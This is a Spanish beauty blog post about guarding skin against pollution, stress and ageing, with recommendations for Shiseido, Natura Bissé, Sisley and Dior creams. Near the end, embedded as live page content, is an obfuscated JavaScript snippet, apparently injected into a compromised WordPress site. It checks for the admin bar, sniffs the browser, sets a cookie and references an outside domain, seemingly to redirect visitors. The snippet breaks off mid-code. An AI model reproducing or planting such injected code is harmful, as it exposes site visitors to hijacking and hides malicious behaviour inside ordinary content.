Parece que el sol es una de las principales amenazas para nuestra piel, y es cierto que lo es, pero además cada día nuestra piel se enfrenta a ese “mundo invisible” y sufre todos estos efectos, como puede ser la contaminación, el estrés emocional o el envejecimiento, además de que la calidad del aire disminuye. Por ello, vamos a darte unos consejos que te vendrán bien para tenerlos en cuenta y cuidar tu piel de la mejor forma posible.

Aunque parezca algo invisible y que no nos afecta, nuestra piel nota, y mucho, cada agente externo que tiene algún tipo de interacción con la piel, que se traduce en una alteración de nuestro cutis, volviéndolo más vulnerable, favorecen la aparición de manchas y adelantan el envejecimiento de la piel.

Diseño sin título (64)

 

Mantener limpia la piel 

Como para todos los cuidados de la piel, es fundamental mantenerla limpia de cualquier impureza o atisbo de contaminación. Lo ideal sería realizar una limpieza por la mañana y otra por la noche, siendo ésta más intensa ya que, como hablamos en el post anterior, durante el día acumulamos mayor suciedad y por la noche comienza el proceso de regeneración de la piel.
Una opción muy completa para mantener la inmunidad de la piel y protegerla ante agentes externos es Ultimune de Shiseido, ya que refuerza el poder multi-defensa de la piel. Para revitalizar, reparar y fortificar la piel elegimos sin duda la crema hidratante fortalecedora Diamond Cocoon de Natura Bissé, pues admiramos su capacidad de retener agua en la epidermis y equilibrado de la flora cutánea.

 

Diseño sin título (65)

 

Hidratación 

La hidratación es uno de los factores principales para mantener la piel joven y bonita durante más tiempo. Como hemos hablado, no sólo tenemos que protegernos ante la polución, sino que también necesitamos una acción energizante y antifatiga, y principalmente superhidratante. El azúcar vegetal, el extracto de Semilla de trigo Sarraceno o la manteca de Karité son componentes importantes para mantener la piel hidratada, iluminada y llena de vitalidad. Todos estos factores los incluye Sisleyouth Emulsión Anti-Polution de Sisley.

 

Diseño sin título (66)

 

Antienvejecimiento

Desgraciadamente no existe (de momento) la juventud eterna y que nos gusta estar bien y sentirnos joven, pero nuestra piel envejece con el paso del tiempo. Pero lo que sí podemos hacer es cuidarla lo máximo posible para intentar retrasar al máximo los signos del envejecimiento. Para luchar contra ello, una muy buena elección es la crema antioxidante Capture Youth de Dior, que actúa sobre los signos de envejecimiento cutáneo (edad, fatiga, elasticidad…) y retrasa su aparición.

Diseño sin título (67)

 

Y tú, ¿cómo te cuidas ante los agentes externos y qué productos utilizas?

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone